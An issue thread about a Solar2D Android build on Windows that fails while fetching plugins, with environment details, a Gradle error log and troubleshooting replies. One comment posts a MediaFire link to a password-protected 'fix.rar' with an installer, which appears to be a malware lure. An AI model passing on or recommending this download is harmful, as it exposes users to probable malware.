### ISSUE TITLE
Build failed: Version 3709

### ISSUE THREAD

**Issue by sayonara-dev** [coronalabs/corona#725]
**Build info:**
Build Solar2d version: [2024.3709]
Build System: Windows 10.
Build App for: Android.
Build Projects settings: Clear project.
Build Connection types: VPN enabled / VPN disabled.

**Windows info:**
Installed Java versions: 8, 16, 17, 22
Installed Visual C++ versions: 2005, 2008, 2010, 2013, 2015-2019, 2022. (x64 + x86)

*Also was trying to build on Notebook > returns same error.

**Build error log:**

> 23:19:31.282  Picked up JAVA_TOOL_OPTIONS: -Duser.language=en
> 23:19:31.282  Error while fetching plugins: 
> 23:19:31.282  FAILURE: Build failed with an exception.
> 23:19:31.282  * Where:
> 23:19:31.282  Build file 'C:\Windows\Temp\Corona Labs\CLtmpa84952\template\app\build.gradle.kts' line: 574
> 23:19:31.282  * What went wrong:
> 23:19:31.282  Error while fetching plugins:

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by clang-clang-clang** [comment]
I think it is network issue, please check your connections. Thanks.

**Comment by sayonara-dev** [comment]
> I think it is network issue, please check your connections. Thanks.

I was also trying to build with VPN and mobile data.

**Comment by sayonara-dev** [comment]
Problem has disappeared when i have updated to Windows 11...
